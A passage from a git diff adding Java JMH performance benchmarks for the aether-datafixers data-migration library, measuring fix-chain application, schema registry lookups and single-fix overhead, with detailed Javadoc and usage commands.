+ * + * @author Erik Pförtner + * @see SingleFixBenchmark + * @see BenchmarkBootstrap#createChainFixer(int) + * @see BenchmarkBootstrap#createMixedFixer(int) + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class MultiFixChainBenchmark { + + /** + * The number of fixes in the chain, injected by JMH. + * + *

+ * <p>This parameter controls the length of the fix chain being benchmarked.
+ * Higher values test the system's ability to handle long migration paths
+ * efficiently.</p>
+ *
+ * <ul>
+ *   <li><b>1:</b> Baseline single-fix performance (compare with {@link SingleFixBenchmark})</li>
+ *   <li><b>5:</b> Short chain typical of minor version updates</li>
+ *   <li><b>10:</b> Medium chain representing moderate version gaps</li>
+ *   <li><b>25:</b> Long chain simulating significant version jumps</li>
+ *   <li><b>50:</b> Stress test for extended migration paths</li>
+ * </ul>
+ */ + @Param({"1", "5", "10", "25", "50"}) + private int fixCount; + + /** + * The payload size parameter, injected by JMH. + * + *

+ * <p>Controls the complexity of generated test data. Only SMALL and MEDIUM
+ * sizes are used to keep benchmark runtime reasonable while still capturing
+ * scaling behavior.</p>

+ * + * @see PayloadSize + */ + @Param({"SMALL", "MEDIUM"}) + private PayloadSize payloadSize; + + /** + * DataFixer configured with a chain of homogeneous field rename fixes. + * + *

+ * <p>Each fix in the chain performs a simple field rename operation
+ * (v{@code n} → v{@code n+1}). This represents the best-case scenario
+ * for chain execution.</p>

+ */ + private DataFixer chainFixer; + + /** + * DataFixer configured with a chain of heterogeneous fix operations. + * + *

+ * <p>The chain includes a mix of rename, add, and transform operations to
+ * simulate realistic migration scenarios. Falls back to {@link #chainFixer}
+ * if mixed fixer creation fails.</p>

+ */ + private DataFixer mixedFixer; + + /** + * Pre-generated input data matching {@link #payloadSize}. + * + *

+ * <p>Regenerated at each iteration to ensure consistent GC behavior
+ * and avoid caching effects.</p>

+ */ + private Dynamic input; + + /** + * Source version for migrations (always v1). + */ + private DataVersion fromVersion; + + /** + * Target version for full chain migrations (v{@link #fixCount} + 1). + */ + private DataVersion toVersion; + + /** + * Target version for partial chain migrations (approximately half of {@link #toVersion}). + * + *

+ * <p>Used by {@link #partialChain} to measure performance when only a subset
+ * of the available fixes is applied.</p>

+ */ + private DataVersion halfwayToVersion; + + /** + * Initializes the benchmark state once per trial. + * + *

+ * <p>Creates the chain and mixed fixers based on the current {@link #fixCount}
+ * parameter. Also calculates the version bounds for full and partial chain
+ * execution.</p>
+ *
+ * <p>If mixed fixer creation fails (e.g., due to unsupported operations),
+ * the chain fixer is used as a fallback to ensure the benchmark can still run.</p>

+ */ + @Setup(Level.Trial) + public void setupTrial() { + this.chainFixer = BenchmarkBootstrap.createChainFixer(this.fixCount); + + try { + this.mixedFixer = BenchmarkBootstrap.createMixedFixer(this.fixCount); + } catch (final RuntimeException ex) { + this.mixedFixer = this.chainFixer; + } + + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(this.fixCount + 1); + + final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1); + this.halfwayToVersion = new DataVersion(halfwayVersion); + } + + /** + * Regenerates input data at each iteration. + * + *

+ * <p>Fresh data generation per iteration ensures that:</p>
+ *
+ * <ul>
+ *   <li>GC behavior is consistent across iterations</li>
+ *   <li>JIT optimizations don't over-specialize on specific data patterns</li>
+ *   <li>Memory allocation patterns are representative of real usage</li>
+ * </ul>
+ */ + @Setup(Level.Iteration) + public void setupIteration() { + this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize); + } + + /** + * Benchmarks a chain of homogeneous field rename operations. + * + *

+ * <p>Measures the performance of applying {@link #fixCount} sequential rename
+ * fixes to migrate data from v1 to v{@code fixCount+1}. This represents an
+ * optimistic scenario where all fixes perform the same lightweight operation.</p>
+ *
+ * <p>Use this benchmark to establish baseline chain performance and detect
+ * any non-linear scaling behavior in the fix application pipeline.</p>

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void renameChain(final Blackhole blackhole) { + final Dynamic result = this.chainFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.input, + this.fromVersion, + this.toVersion); + blackhole.consume(result); + } + + /** + * Benchmarks a chain of heterogeneous fix operations. + * + *

+ * <p>Measures the performance of applying {@link #fixCount} sequential fixes
+ * that include a mix of operations:</p>
+ *
+ * <ul>
+ *   <li>Field renames</li>
+ *   <li>Field additions with default values</li>
+ *   <li>Field transformations (type conversions, value mappings)</li>
+ * </ul>
+ *
+ * <p>This benchmark provides a more realistic performance profile compared
+ * to {@link #renameChain}, as real-world migrations typically involve
+ * diverse operations.</p>

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void mixedChain(final Blackhole blackhole) { + final Dynamic result = this.mixedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.input, + this.fromVersion, + this.toVersion); + blackhole.consume(result); + } + + /** + * Benchmarks partial chain execution stopping at halfway version. + * + *

+ * <p>Measures the performance of applying only half of the available fixes
+ * in the chain. This simulates scenarios where:</p>
+ *
+ * <ul>
+ *   <li>Data is migrated incrementally rather than to the latest version</li>
+ *   <li>The target version is not the most recent available</li>
+ *   <li>Partial upgrades are performed for compatibility reasons</li>
+ * </ul>
+ *
+ * <p>Comparing this benchmark with {@link #renameChain} reveals whether
+ * fix selection and version range calculations add significant overhead.</p>

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void partialChain(final Blackhole blackhole) { + final Dynamic result = this.chainFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.input, + this.fromVersion, + this.halfwayToVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java new file mode 100644 index 0000000..0b72395 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java @@ -0,0 +1,384 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.core; + +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.schema.Schema; +import de.splatgames.aether.datafixers.api.schema.SchemaRegistry; +import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry; +import de.splatgames.aether.datafixers.testkit.factory.MockSchemas; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.SplittableRandom; +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for schema registry lookup performance. + * + *

+ * <p>Measures the overhead of various schema lookup operations as registry size
+ * grows. Schema lookups are performed frequently during data migration, so their
+ * performance directly impacts overall migration throughput.</p>

+ *
+ * <h2>Benchmark Methods</h2>
+ *
+ * <ul>
+ *   <li>{@link #exactLookup} - Direct lookup by exact version match</li>
+ *   <li>{@link #floorLookup} - Floor lookup finding the closest version ≤ target</li>
+ *   <li>{@link #latestLookup} - Retrieval of the most recent schema</li>
+ *   <li>{@link #sequentialLookup} - Sequential traversal of all registered versions</li>
+ * </ul>

+ * <h2>Parameters</h2>
+ *
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>schemaCount</td><td>10, 50, 100, 500</td><td>Number of schemas in the registry</td></tr>
+ * </table>

+ * <h2>Benchmark Configuration</h2>
+ *
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>5 iterations, 1 second each</td></tr>
+ *   <tr><td>Measurement</td><td>10 iterations, 1 second each</td></tr>
+ *   <tr><td>Forks</td><td>2 (for statistical significance)</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Nanoseconds</td></tr>
+ * </table>

+ * <h2>Interpreting Results</h2>
+ *
+ * <ul>
+ *   <li><b>O(1) lookups:</b> {@link #exactLookup} and {@link #latestLookup} should show constant time regardless of registry size</li>
+ *   <li><b>O(log n) lookups:</b> {@link #floorLookup} may show logarithmic scaling if implemented via binary search</li>
+ *   <li><b>O(n) lookups:</b> {@link #sequentialLookup} should scale linearly with schema count</li>
+ *   <li><b>Cache effects:</b> Larger registries may show increased lookup time due to CPU cache pressure</li>
+ * </ul>

+ * <h2>Usage</h2>
+ *
+ * <pre>{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SchemaLookupBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific schema count only
+ * java -jar benchmarks.jar SchemaLookupBenchmark -p schemaCount=100
+ *
+ * # Run specific lookup benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark.exactLookup
+ * }</pre>
+ * + * @author Erik Pförtner + * @see SchemaRegistry + * @see SimpleSchemaRegistry + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.NANOSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class SchemaLookupBenchmark { + + /** + * Benchmarks exact version lookup performance. + * + *

+ * <p>Measures the time to retrieve a schema by its exact registered version.
+ * This is the most common lookup pattern during migration when the source
+ * version is known precisely.</p>
+ *
+ * <p>The benchmark uses pre-generated random indices to avoid RNG overhead
+ * in the measurement loop. Each invocation looks up a different random version
+ * to prevent branch prediction optimization.</p>

+ * + * @param s the shared benchmark state containing the registry and versions + * @param t the per-thread state providing random lookup indices + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void exactLookup(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final int index = t.nextExactIndex(); + final Schema schema = s.registry.get(s.versions[index]); + blackhole.consume(schema); + } + + /** + * Benchmarks floor lookup performance. + * + *

+ * <p>Measures the time to retrieve a schema using floor semantics, where
+ * the registry returns the schema with the highest version ≤ the requested
+ * version. This pattern is used when data may be at intermediate versions
+ * not explicitly registered.</p>
+ *
+ * <p>The lookup versions include both exact matches (10, 20, 30, ...) and
+ * in-between values (5, 15, 25, ...) to exercise both fast-path exact matches
+ * and slower floor searches.</p>
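+ *
+ * <p>The floor semantics can be pictured as a sorted-map lookup. This is a
+ * sketch of the behavior only, not the actual {@link SimpleSchemaRegistry}
+ * internals:</p>
+ *
+ * <pre>{@code
+ * NavigableMap<Integer, Schema> byVersion = new TreeMap<>();
+ * // registered versions: 10, 20, 30, ...
+ * Map.Entry<Integer, Schema> hit = byVersion.floorEntry(15);
+ * // hit.getKey() == 10: the highest registered version <= 15
+ * }</pre>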

+ * + * @param s the shared benchmark state containing the registry and lookup versions + * @param t the per-thread state providing random lookup indices + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void floorLookup(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final int index = t.nextFloorIndex(); + final Schema schema = s.registry.get(s.lookupVersions[index]); + blackhole.consume(schema); + } + + /** + * Benchmarks latest schema retrieval performance. + * + *

+ * <p>Measures the time to retrieve the most recent schema from the registry.
+ * This operation should be O(1) as the latest schema is typically cached or
+ * stored in a dedicated field.</p>
+ *
+ * <p>This benchmark serves as a baseline for the fastest possible lookup
+ * operation and helps identify any unexpected overhead in the registry
+ * implementation.</p>

+ * + * @param s the shared benchmark state containing the registry + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void latestLookup(final BenchmarkState s, + final Blackhole blackhole) { + final Schema schema = s.registry.latest(); + blackhole.consume(schema); + } + + /** + * Benchmarks sequential lookup of all registered schemas. + * + *

+ * <p>Measures the aggregate time to look up every schema in the registry
+ * in version order. This pattern occurs during schema validation, debugging,
+ * or when building migration path analyses.</p>
+ *
+ * <p><b>Note:</b> This benchmark performs multiple lookups per invocation
+ * ({@code schemaCount} lookups). The reported time is for the entire sequence,
+ * not per lookup. Divide by {@code schemaCount} to get per-lookup overhead.</p>
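+ *
+ * <p>For example, a reported average of 5,000 ns/op at {@code schemaCount = 100}
+ * corresponds to roughly 5,000 / 100 = 50 ns per individual lookup.</p>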

+ * + * @param s the shared benchmark state containing the registry and versions + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void sequentialLookup(final BenchmarkState s, + final Blackhole blackhole) { + for (final DataVersion version : s.versions) { + final Schema schema = s.registry.get(version); + blackhole.consume(schema); + } + } + + /** + * Shared JMH state containing the schema registry and version arrays. + * + *

+ * <p>This state is shared across all threads within a benchmark trial
+ * ({@link Scope#Benchmark}). The registry is populated with mock schemas at
+ * versions 10, 20, 30, ... up to {@code schemaCount * 10}.</p>
+ *
+ * <p>The registry is frozen after setup to match production usage patterns
+ * where registries are immutable during normal operation.</p>

+ */ + @State(Scope.Benchmark) + public static class BenchmarkState { + + /** + * The number of schemas to register, injected by JMH. + * + *

+ * <p>Controls the size of the schema registry to measure lookup
+ * performance scaling:</p>
+ *
+ * <ul>
+ *   <li><b>10:</b> Small registry, fits entirely in L1 cache</li>
+ *   <li><b>50:</b> Medium registry, typical for most applications</li>
+ *   <li><b>100:</b> Large registry, may exceed L1 cache</li>
+ *   <li><b>500:</b> Stress test for registry scalability</li>
+ * </ul>
+ */ + @Param({"10", "50", "100", "500"}) + public int schemaCount; + + /** + * The frozen schema registry containing all registered schemas. + */ + public SchemaRegistry registry; + + /** + * Array of exact registered versions (10, 20, 30, ...). + * + *

+ * <p>Used by {@link #exactLookup} to ensure lookups always hit
+ * registered versions.</p>

+ */ + public DataVersion[] versions; + + /** + * Array of lookup versions including in-between values (5, 10, 15, 20, ...). + * + *

+ * <p>Used by {@link #floorLookup} to exercise both exact matches
+ * and floor search behavior.</p>

+ */ + public DataVersion[] lookupVersions; + + /** + * Initializes the schema registry and version arrays once per trial. + * + *

+ * <p>Creates a {@link SimpleSchemaRegistry} populated with minimal mock
+ * schemas at regular version intervals. The registry is frozen after
+ * population to enable any internal optimizations.</p>

+ */ + @Setup(Level.Trial) + public void setup() { + final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry(); + this.versions = new DataVersion[this.schemaCount]; + + for (int i = 0; i < this.schemaCount; i++) { + final int version = (i + 1) * 10; + final DataVersion dataVersion = new DataVersion(version); + this.versions[i] = dataVersion; + simpleRegistry.register(MockSchemas.minimal(version)); + } + + simpleRegistry.freeze(); + this.registry = simpleRegistry; + + this.lookupVersions = new DataVersion[this.schemaCount * 2]; + for (int i = 0; i < this.lookupVersions.length; i++) { + this.lookupVersions[i] = new DataVersion((i + 1) * 5); + } + } + } + + /** + * Per-thread JMH state providing pre-generated random lookup indices. + * + *

+ * <p>Random number generation is expensive and would dominate the benchmark
+ * if performed in the hot path. This state pre-generates buffers of random
+ * indices during setup, allowing the benchmark methods to retrieve indices
+ * via simple array access and bit masking.</p>
+ *
+ * <p>Each thread has its own state instance ({@link Scope#Thread}) to avoid
+ * contention on shared RNG state. The fixed seed ensures reproducible results
+ * across benchmark runs.</p>

+ * + * @see BenchmarkState + */ + @State(Scope.Thread) + public static class ThreadState { + + /** + * Size of the pre-generated index buffer. + * + *

+ * <p>Power-of-two size enables cheap index wrapping via bit masking
+ * instead of a modulo operation.</p>

+ */ + private static final int INDEX_BUFFER_SIZE = 1024; + + /** + * Bit mask for wrapping cursor to buffer bounds ({@code INDEX_BUFFER_SIZE - 1}). + */ + private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1; + + /** + * Pre-generated indices into {@link BenchmarkState#versions}. + */ + private final int[] exactIndices = new int[INDEX_BUFFER_SIZE]; + + /** + * Pre-generated indices into {@link BenchmarkState#lookupVersions}. + */ + private final int[] floorIndices = new int[INDEX_BUFFER_SIZE]; + + /** + * Current position in {@link #exactIndices}. + */ + private int exactCursor; + + /** + * Current position in {@link #floorIndices}. + */ + private int floorCursor; + + /** + * Thread-local random number generator for index generation. + */ + private SplittableRandom random; + + /** + * Initializes the random number generator once per trial. + * + *

+ * <p>Uses a fixed seed (42) for reproducibility. Each thread gets its
+ * own {@link SplittableRandom} instance to avoid synchronization overhead.</p>

+ */ + @Setup(Level.Trial) + public void setupTrial() { + this.random = new SplittableRandom(42L); + } + + /** + * Refills the index buffers at each iteration. + * + *

+ * <p>Generates fresh random indices based on the current
+ * {@link BenchmarkState#schemaCount} parameter. Resets cursors to the
+ * beginning of each buffer.</p>

+ * + * @param s the shared benchmark state providing array bounds + */ + @Setup(Level.Iteration) + public void setupIteration(final BenchmarkState s) { + for (int i = 0; i < INDEX_BUFFER_SIZE; i++) { + this.exactIndices[i] = this.random.nextInt(s.versions.length); + this.floorIndices[i] = this.random.nextInt(s.lookupVersions.length); + } + this.exactCursor = 0; + this.floorCursor = 0; + } + + /** + * Returns the next random index for exact version lookup. + * + *

+ * <p>Uses bit masking to wrap around the buffer efficiently.</p>

+ * + * @return a random index into {@link BenchmarkState#versions} + */ + public int nextExactIndex() { + return this.exactIndices[this.exactCursor++ & INDEX_MASK]; + } + + /** + * Returns the next random index for floor version lookup. + * + *

+ * <p>Uses bit masking to wrap around the buffer efficiently.</p>

+ * + * @return a random index into {@link BenchmarkState#lookupVersions} + */ + public int nextFloorIndex() { + return this.floorIndices[this.floorCursor++ & INDEX_MASK]; + } + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java new file mode 100644 index 0000000..c74d288 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java @@ -0,0 +1,315 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.core; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for single DataFix application performance. + * + *
+ * <p>Measures the overhead of applying a single fix to data of varying sizes.
+ * Includes a baseline identity fix measurement to isolate framework overhead from actual transformation costs.</p>
+ * + *
+ * <h2>Benchmark Methods</h2>
+ * <ul>
+ *   <li>{@link #identityFix} - Baseline measurement with no-op transformation</li>
+ *   <li>{@link #singleRenameFix} - Single field rename operation</li>
+ *   <li>{@link #playerDataFix} - Complex object transformation with codec roundtrip</li>
+ *   <li>{@link #playerDataFixEndToEnd} - Full pipeline including setup overhead</li>
+ * </ul>
+ * + *
+ * <h2>Benchmark Configuration</h2>
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>5 iterations, 1 second each</td></tr>
+ *   <tr><td>Measurement</td><td>10 iterations, 1 second each</td></tr>
+ *   <tr><td>Forks</td><td>2 (for statistical significance)</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Microseconds</td></tr>
+ * </table>
+ *
+ * <h2>Interpreting Results</h2>
+ * <ul>
+ *   <li>Throughput (ops/us): Higher is better. Operations per microsecond.</li>
+ *   <li>Average Time (us/op): Lower is better. Microseconds per operation.</li>
+ *   <li>Error (±): 99.9% confidence interval. Smaller means more stable results.</li>
+ * </ul>
+ *
+ * <h2>Usage</h2>
+ * <pre>{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SingleFixBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SingleFixBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific payload size only
+ * java -jar benchmarks.jar SingleFixBenchmark -p payloadSize=SMALL
+ * }</pre>
+ * + * @author Erik Pförtner + * @see BenchmarkBootstrap + * @see BenchmarkDataGenerator + * @see PayloadSize + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class SingleFixBenchmark { + + /** + * Benchmarks a single field rename operation. + * + *
+ * <p>Measures the performance of renaming one field in the input data.
+ * This represents a common, lightweight migration operation. The benchmark is parameterized by {@link PayloadSize}
+ * to measure scaling behavior.</p>
+ * + * @param s the shared benchmark state containing fixer and input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void singleRenameFix(final SizedState s, + final Blackhole blackhole) { + blackhole.consume(s.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + s.input, + s.fromVersion, + s.toVersion)); + } + + /** + * Benchmarks the identity (no-op) fix as a baseline measurement. + * + *
+ * <p>Measures pure framework overhead without any actual data transformation.
+ * Use this as a baseline to calculate the true cost of transformations by subtracting identity time from other
+ * benchmark results.</p>
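+ * <p>For example (illustrative numbers only): if {@link #singleRenameFix} averages 1.5 us/op
+ * and this baseline averages 0.3 us/op, the rename transformation itself costs roughly 1.2 us/op.</p>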
+ * + * @param s the shared benchmark state containing identity fixer and input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void identityFix(final SizedState s, + final Blackhole blackhole) { + blackhole.consume(s.identityFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + s.input, + s.fromVersion, + s.toVersion)); + } + + /** + * Benchmarks a complex player data transformation with codec roundtrip. + * + *
+ * <p>Measures the performance of a realistic migration scenario where data
+ * is decoded via codec, transformed, and re-encoded. This represents the upper bound of migration cost for complex
+ * object transformations.</p>
+ * + *
+ * <p>This benchmark is expected to be significantly slower than {@link #singleRenameFix}
+ * because codec roundtrips involve reflection, object instantiation, and full serialization/deserialization
+ * cycles.</p>
+ * + * @param s the shared player benchmark state + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void playerDataFix(final PlayerState s, + final Blackhole blackhole) { + blackhole.consume(s.playerFixer.update( + BenchmarkBootstrap.PLAYER_TYPE, + s.playerInput, + s.fromVersion, + s.toVersion)); + } + + /** + * Benchmarks the complete end-to-end pipeline including setup overhead. + * + *
+ * <p>Measures the total cost of a migration including:</p>
+ * <ul>
+ *   <li>Test data generation</li>
+ *   <li>DataFixer bootstrap and initialization</li>
+ *   <li>Actual migration execution</li>
+ * </ul>
+ * + *
+ * <p>This benchmark is useful for understanding cold-start performance
+ * and the cost of creating new DataFixer instances. In production code,
+ * DataFixers should be reused rather than recreated per operation.</p>
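+ * <p>A minimal reuse sketch (the {@code records} collection is hypothetical; the
+ * factory and {@code update} calls mirror this benchmark):</p>
+ * <pre>{@code
+ * // Bootstrap once, then amortize the cost across every record that needs fixing.
+ * DataFixer playerFixer = BenchmarkBootstrap.createPlayerFixer();
+ * for (Dynamic<JsonElement> rec : records) {
+ *     playerFixer.update(BenchmarkBootstrap.PLAYER_TYPE, rec,
+ *             new DataVersion(1), new DataVersion(2));
+ * }
+ * }</pre>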
+ * + *
+ * <p>Note: Results will be significantly slower than {@link #playerDataFix}
+ * due to setup overhead included in each iteration.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void playerDataFixEndToEnd(final Blackhole blackhole) { + final Dynamic playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE); + final DataFixer playerFixer = BenchmarkBootstrap.createPlayerFixer(); + blackhole.consume(playerFixer.update( + BenchmarkBootstrap.PLAYER_TYPE, + playerInput, + new DataVersion(1), + new DataVersion(2))); + } + + /** + * Shared JMH state for benchmarks parameterized by payload size. + * + *
+ * <p>This state is shared across all threads within a benchmark trial
+ * ({@link Scope#Benchmark}). The {@link #payloadSize} parameter controls the complexity of test data:</p>
+ * + *
+ * <ul>
+ *   <li>SMALL: 5 fields, 2 nesting levels, 10 array elements</li>
+ *   <li>MEDIUM: 20 fields, 4 nesting levels, 100 array elements</li>
+ *   <li>LARGE: 50 fields, 6 nesting levels, 1000 array elements</li>
+ * </ul>
+ * + * @see PayloadSize + */ + @State(Scope.Benchmark) + public static class SizedState { + + /** + * The payload size parameter, injected by JMH. Controls the complexity of generated test data. + */ + @Param({"SMALL", "MEDIUM", "LARGE"}) + public PayloadSize payloadSize; + + /** + * DataFixer configured with a single field rename fix (v1 → v2). + */ + public DataFixer fixer; + + /** + * DataFixer configured with an identity (no-op) fix for baseline measurement. + */ + public DataFixer identityFixer; + + /** + * Pre-generated input data matching {@link #payloadSize}. + */ + public Dynamic input; + + /** + * Source version for migrations (v1). + */ + public DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + public DataVersion toVersion; + + /** + * Initializes the benchmark state once per trial. + * + *
+ * <p>Creates fixers and generates test data based on the current
+ * {@link #payloadSize} parameter value.</p>
+ */ + @Setup(Level.Trial) + public void setup() { + this.fixer = BenchmarkBootstrap.createSingleFixFixer(); + this.identityFixer = BenchmarkBootstrap.createIdentityFixer(); + this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + } + + /** + * Shared JMH state for player-specific benchmarks. + * + *
+ * <p>This state is separate from {@link SizedState} because the player benchmark
+ * uses a fixed, realistic data structure rather than parameterized payload sizes. The player data simulates a
+ * typical game entity with nested objects, arrays, and various field types.</p>
+ * + *
+ * <p>The player fix performs a complete codec roundtrip transformation,
+ * making it representative of real-world migration scenarios where data is decoded, transformed, and
+ * re-encoded.</p>
